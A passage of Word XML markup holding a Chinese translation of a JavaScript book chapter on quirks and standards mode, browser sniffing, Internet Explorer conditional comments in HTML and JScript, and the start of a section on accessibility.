        <w:t>方法，但</w:t>
      </w:r>
      <w:r>
        <w:t>Microsoft</w:t>
      </w:r>
      <w:r>
        <w:t>只是实现了一部分</w:t>
      </w:r>
      <w:r>
        <w:t>W3C</w:t>
      </w:r>
      <w:r>
        <w:t>规范，在调用</w:t>
      </w:r>
      <w:r>
        <w:t>addEventListener()</w:t>
      </w:r>
      <w:r>
        <w:t>之前这将会给使用特性测试的代码带来很多麻烦。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="321" w:name="13_4_4_Guai_Yi_Mo_Shi_He_Biao_Zhun_Mo_Sh"/>
      <w:r>
        <w:t>13.4.4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　怪异模式和标准模式</w:t>
      </w:r>
      <w:bookmarkEnd w:id="321"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Microsoft</w:t>
      </w:r>
      <w:r>
        <w:t>在发布</w:t>
      </w:r>
      <w:r>
        <w:t>IE6</w:t>
      </w:r>
      <w:r>
        <w:t>的时候，增加了</w:t>
      </w:r>
      <w:r>
        <w:t>IE5</w:t>
      </w:r>
      <w:r>
        <w:t>里没有的很多</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>标准特性。但为了确保与已有</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>内容的后向兼容性，它定义了两种不同的渲染模式。在</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>标准模式</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>“CSS</w:t>
      </w:r>
      <w:r>
        <w:t>兼容模式</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>中，浏览器要遵循</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>标准，在</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>怪异模式</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>中，浏览器表现的和</w:t>
      </w:r>
      <w:r>
        <w:t>IE4</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>IE5</w:t>
      </w:r>
      <w:r>
        <w:t>中的怪异非标准模式一样。渲染模式的选择依赖于</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>文件顶部的</w:t>
      </w:r>
      <w:r>
        <w:t>DOCTYPE</w:t>
      </w:r>
      <w:r>
        <w:t>声明，在</w:t>
      </w:r>
      <w:r>
        <w:t>IE6</w:t>
      </w:r>
      <w:r>
        <w:t>中打开没有</w:t>
      </w:r>
      <w:r>
        <w:t>DOCTYPE</w:t>
      </w:r>
      <w:r>
        <w:t>的页面和声明了某些权限</w:t>
      </w:r>
      <w:r>
        <w:t>Doctype</w:t>
      </w:r>
      <w:r>
        <w:t>的页面都会按照怪异模式进行渲染，定义了严格的</w:t>
      </w:r>
      <w:r>
        <w:t>Doctype</w:t>
      </w:r>
      <w:r>
        <w:t>的页面（或者为了做到前向兼容性而添加了未知的</w:t>
      </w:r>
      <w:r>
        <w:t>Doctype</w:t>
      </w:r>
      <w:r>
        <w:t>的页面）会按照标准模式进行渲染，定义了</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5 Doctype</w:t>
      </w:r>
      <w:r>
        <w:t>（＜</w:t>
      </w:r>
      <w:r>
        <w:t>!DOCTYPE html</w:t>
      </w:r>
      <w:r>
        <w:t>＞）的页面在所有现代浏览器中都会按照标准模式渲染。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>怪异模式和标准模式之间的差别经历了很长时间的发展</w:t>
      </w:r>
      <w:r>
        <w:t>历程，现在新版本的</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>都支持标准模式，其他主流浏览器也都支持标准模式。这两种模式都已经被</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>规范所认可。怪异模式和标准模式之间的差异对于</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>开发者影响最大。但客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码则是需要知道文档以哪种模式进行渲染的。要进行这种渲染模式的特性检测，通常检查</w:t>
      </w:r>
      <w:r>
        <w:t>document.compatMode</w:t>
      </w:r>
      <w:r>
        <w:t>属性。如果其值为</w:t>
      </w:r>
      <w:r>
        <w:t>"CSS1Compat"</w:t>
      </w:r>
      <w:r>
        <w:t>，则说明浏览器工作在标准模式；如果值为</w:t>
      </w:r>
      <w:r>
        <w:t>"BackCompat"</w:t>
      </w:r>
      <w:r>
        <w:t>（或</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>，说明属性根本不存在），则说明浏览器工作在怪异模式。所有现代浏览器都</w:t>
      </w:r>
      <w:r>
        <w:t>实现了</w:t>
      </w:r>
      <w:r>
        <w:t>compatMode</w:t>
      </w:r>
      <w:r>
        <w:t>属性，并且</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>规范对它进行了标准化。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>测试</w:t>
      </w:r>
      <w:r>
        <w:t>compatMode</w:t>
      </w:r>
      <w:r>
        <w:t>不是必要的。但是，在例</w:t>
      </w:r>
      <w:r>
        <w:t>15-8</w:t>
      </w:r>
      <w:r>
        <w:t>展示的示例代码中用到了它。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="322" w:name="13_4_5_Liu_Lan_Qi_Ce_Shi_"/>
      <w:r>
        <w:t>13.4.5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　浏览器测试</w:t>
      </w:r>
      <w:bookmarkEnd w:id="322"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>功能测试非常适用于检测大型功能领域的支持，比如可以使用这种方法来确定浏览器是否支持</w:t>
      </w:r>
      <w:r>
        <w:t>W3C</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理模型还是</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>的事件处理模型。另外，有时候可能会需要在某种浏览器中解决个别的</w:t>
      </w:r>
      <w:r>
        <w:t>bug</w:t>
      </w:r>
      <w:r>
        <w:t>或难题，但却没有太好的方法来检测</w:t>
      </w:r>
      <w:r>
        <w:t>bug</w:t>
      </w:r>
      <w:r>
        <w:t>的存在性。在这种情况下，</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>需要创建一个针对某个平台的解决方案，这个解决方案和特定的浏览器厂商、版本或操作系统（或三方面的组</w:t>
      </w:r>
      <w:r>
        <w:t>合）联系紧密。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中检测浏览器类型和版本的方法就是使用</w:t>
      </w:r>
      <w:r>
        <w:t>Navigator</w:t>
      </w:r>
      <w:r>
        <w:t>对象，我们将在第</w:t>
      </w:r>
      <w:r>
        <w:t>14</w:t>
      </w:r>
      <w:r>
        <w:t>章学习它，确定当前浏览器的厂商和版本的代码通常叫做浏览器嗅探器（</w:t>
      </w:r>
      <w:r>
        <w:t>browser sniffer</w:t>
      </w:r>
      <w:r>
        <w:t>）或者客户端嗅探器（</w:t>
      </w:r>
      <w:r>
        <w:t>client sniffer</w:t>
      </w:r>
      <w:r>
        <w:t>）。例</w:t>
      </w:r>
      <w:r>
        <w:t>14-3</w:t>
      </w:r>
      <w:r>
        <w:t>给出了一个简单的例子。在</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>的早期，当</w:t>
      </w:r>
      <w:r>
        <w:t>Netscape</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>平台两者相互不兼容的时候，客户端嗅探（</w:t>
      </w:r>
      <w:r>
        <w:t>client sniffing</w:t>
      </w:r>
      <w:r>
        <w:t>）就是一种常见的客户端编程技术，现在兼容性情况已经基本稳定，浏览器嗅探不像若干年前这样常用，但偶尔有些场景还</w:t>
      </w:r>
      <w:r>
        <w:t>会用到。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>需要注意的是，客户端嗅探也可以在服务器端完成，</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>服务器根据</w:t>
      </w:r>
      <w:r>
        <w:t>User-Agent</w:t>
      </w:r>
      <w:r>
        <w:t>头部可以有选择地返回特定的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码给客户端。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="323" w:name="13_4_6_Internet_ExplorerLi_De_Tiao_Jian_"/>
      <w:r>
        <w:t>13.4.6</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>Internet Explorer</w:t>
      </w:r>
      <w:r>
        <w:t>里的条件注释</w:t>
      </w:r>
      <w:bookmarkEnd w:id="323"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>实际上，读者会发现客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>编程中的很多不兼容性都是针对</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>的。也就是说，必须按照某种方式为</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>编写代码，而按照另一种方式为其他的浏览器编写代码。</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>支持条件注释（由</w:t>
      </w:r>
      <w:r>
        <w:t>IE5</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>引入），尽管这种做法并不符合标准规范，但是在处理不兼容性时非常有用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>下面是</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>中的条件注释的样子。注意</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>注释使用结束的分隔符的技巧：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>!--[if IE 6]</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>This content is actually inside an HTML comment.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>It will only be displayed in IE 6.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>![endif]--</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>!--[if lte IE 7]</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>This content will only be displayed by IE 5,6 and 7 and earlier.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">lte stands for"less than or equal".You </w:t>
      </w:r>
      <w:r>
        <w:t>can also use"lt","gt"and"gte".</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>![endif]--</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>!--[if!IE]</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>This is normal HTML content,but IE will not display it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>because of the comment above and the comment below.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>!--</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>![endif]--</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>This is normal content,displayed by all browsers.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>来看一个具体的例子，上文介绍过使用</w:t>
      </w:r>
      <w:r>
        <w:t>ex</w:t>
      </w:r>
      <w:r>
        <w:t>canvs.js</w:t>
      </w:r>
      <w:r>
        <w:t>类库在</w:t>
      </w:r>
      <w:r>
        <w:t>Internet Explorer</w:t>
      </w:r>
      <w:r>
        <w:t>里实现＜</w:t>
      </w:r>
      <w:r>
        <w:t>canvas</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素。由于这个类库只有</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>需要（并且也只为</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>工作），因此有理由在页面里使用条件注释引入它，这样其他浏览器就不会载入它：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>!--[if IE]</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>script src="excanvas.js"</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>/script</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>![endif]--</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>解释器也支持条件注释，</w:t>
      </w:r>
      <w:r>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>C++</w:t>
      </w:r>
      <w:r>
        <w:t>程序员可能觉得它们和</w:t>
      </w:r>
      <w:r>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:t>预处理器的</w:t>
      </w:r>
      <w:r>
        <w:t>#ifdef/#endif</w:t>
      </w:r>
      <w:r>
        <w:t>功能很相似。</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>中的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>条件注释以文本</w:t>
      </w:r>
      <w:r>
        <w:t>/*@cc_on</w:t>
      </w:r>
      <w:r>
        <w:t>开</w:t>
      </w:r>
      <w:r>
        <w:t>头，以文本</w:t>
      </w:r>
      <w:r>
        <w:t>@*/</w:t>
      </w:r>
      <w:r>
        <w:t>结束（</w:t>
      </w:r>
      <w:r>
        <w:t>cc_on stands</w:t>
      </w:r>
      <w:r>
        <w:t>中的</w:t>
      </w:r>
      <w:r>
        <w:t>cc</w:t>
      </w:r>
      <w:r>
        <w:t>表示条件编译）。下面的条件注释包含了只在</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>中执行的代码：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>/*@cc_on</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>@if(@_jscript)//</w:t>
      </w:r>
      <w:r>
        <w:t>该代码位于一条</w:t>
      </w:r>
      <w:r>
        <w:t>JS</w:t>
      </w:r>
      <w:r>
        <w:t>注释内但在</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>中执行它</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>alert("In IE");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>@end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在一条条件注释内部，关键字</w:t>
      </w:r>
      <w:r>
        <w:t>@if</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>@else</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>@end</w:t>
      </w:r>
      <w:r>
        <w:t>划分出哪些是要被</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>解释器有条件地执行的代码。大多数时候，只需要上面所示的简单的条件：</w:t>
      </w:r>
      <w:r>
        <w:t>@if(@_jscript)</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>JScript</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>Microsoft</w:t>
      </w:r>
      <w:r>
        <w:t>自己的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>解释器的名字，而</w:t>
      </w:r>
      <w:r>
        <w:t>@_jscript</w:t>
      </w:r>
      <w:r>
        <w:t>变量在</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>中总是为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>通过条件注释和常规的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>注释的合理的交叉组合，可以设置在</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>中运行一段代码而在所有其他浏览器中运行另一段不同的代码：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>/*@cc_on</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>@if(@_jscript)//</w:t>
      </w:r>
      <w:r>
        <w:t>这里的代码在一条条件注释中，也在一条常规的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>注释中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//IE</w:t>
      </w:r>
      <w:r>
        <w:t>会执行这段代码，其他浏览器不执行它</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>alert('You are using Internet Explorer);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>@else*///</w:t>
      </w:r>
      <w:r>
        <w:t>这段代码并没在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>注释中，但仍然</w:t>
      </w:r>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>条件注释中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>也就是说除了</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>之外的所有浏览器都执行这里的代码</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>alert('You are not using Internet Explorer');/*@end</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324" w:name="13_5_Ke_Fang_Wen_Xing_"/>
      <w:r>
        <w:t>13.5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　可访问性</w:t>
      </w:r>
      <w:bookmarkEnd w:id="324"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>是发布信息的理想工具，而</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>程序可以增强对信息的访问。然而，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>程序员必须小心，因为程序员写代码太过随意，以至于那些有视觉障碍或者肢体困难的用户没办法正确地获取信息。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>盲人用户使用一种叫做屏幕阅读器的</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>辅助性技术</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>将书面的文字变成语音词汇。有些屏幕阅读器是识别</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的，而另一些只能在禁用</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>时才会工作得更好。如果你设计的站点过于依赖</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
